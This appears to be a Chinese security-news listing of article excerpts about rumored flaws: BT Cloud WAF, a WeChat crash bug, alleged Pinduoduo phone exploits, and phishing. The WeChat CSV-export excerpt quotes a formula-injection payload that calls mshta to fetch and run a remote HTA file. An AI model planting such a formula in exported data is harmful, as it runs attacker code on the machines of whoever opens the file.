关于网传漏洞的说明:1、这个《堡塔云WAF》漏洞去年就修复了。2、漏洞只能查看数据,并不能造成什么威胁,危害性较小。3. btwaf数据库只会存储waf的基础信息和拦截日志不存在任何敏感信息。注意!!...
关于微信csv导出漏洞
先看图网传payload:=mshta|'http:\ceye.io1.hta'!A0图片说的用户名改成以上payload,测试了一下是可以改的,但是长度有限制,下图多加了1个字符就是极限了,实战中基...
网传微信Bug崩溃 原理剖析分享 2023/4/24
微信Bug测试高清样本获取,快来测试下你的微信是否受到影响吧 原文始发于微信公众号(渗透测试网络安全):网传微信Bug崩溃 原理剖析分享 2023/4/24
微信闪退BUG
晚上因西湖论剑刷微信,看到在网传一张疑问的图片若打开图片,微信APP会出现闪退情况。转发、截图该图片也会闪退进行日志分析,可以推测是微信OCR扫描器相关功能模块,由于更新时不当处理,该QR代码使其产生...
吃瓜!网传拼夕夕内核提权攻击用户手机事件
微博原文👇以及之前的 Flanker 事件文章来源:刨洞技术交流原文始发于微信公众号(EchoSec):吃瓜!网传拼夕夕内核提权攻击用户手机事件
网传拼夕夕攻击手机用户
原文始发于微信公众号(网络安全透视镜):网传拼夕夕攻击手机用户
安全热点 | 某安全网被黑客入侵并挂黑页
旨在带大家了解更多安全事件,如文章有问题,可联系删除。声明:本文内容仅对安全类事件进行收集整理,所有内容均来源于互联网,不代表作者任何立场。注意:每个事件的文本框内的内容可上下滑动查看更多内容。本期热...
安全热点 | 两家公司被黑客入侵并挂黑页
旨在带大家了解更多安全事件,如文章有问题,可联系删除。声明:本文内容仅对安全类事件进行收集整理,所有内容均来源于互联网,不代表作者任何立场。注意:每个事件的文本框内的内容可上下滑动查看更多内容。本期热...
2022HVV以来网传漏洞验证情况
来源:奇安信 CERT点击阅读原文,下载Excel文档(链接48小时后失效)。 原文始发于微信公众号(菜鸟学安全):2022HVV以来网传漏洞验证情况
某活动笔记
值班结束后的一些随笔。第三天了,看到好多大佬都总结了最近爆出来的一些洞,本来我也收集了几个poc 。刚才看到奇安信公众号也发了一版,比我的全多了,干脆直接借鉴一下人家的吧,就不发我自己的了,可惜他们...
互联网大厂也难逃钓鱼邮件,电子邮件安全应如何防护?
“5月25日,微博话题 #搜狐全体员工遭遇工资补助诈骗# 短时间内冲上热搜榜第一, 搜狐官方微博后续发表声明称,部分员工在5月18日凌晨收到一封名为《5月份员工工资补助通知》的诈骗邮件,实为某员工使用...
反转再反转,究竟网传的PDF有没有后门
第26期 你好呀~欢迎来到“资讯充电站”!小安就是本站站长。今天第26期如约和大家见面了!如果您是第一次光顾,可以先阅读站内公告了解我们哦。 【站内公告】本站主要发布时下最火热最新鲜的网安资讯,不同于...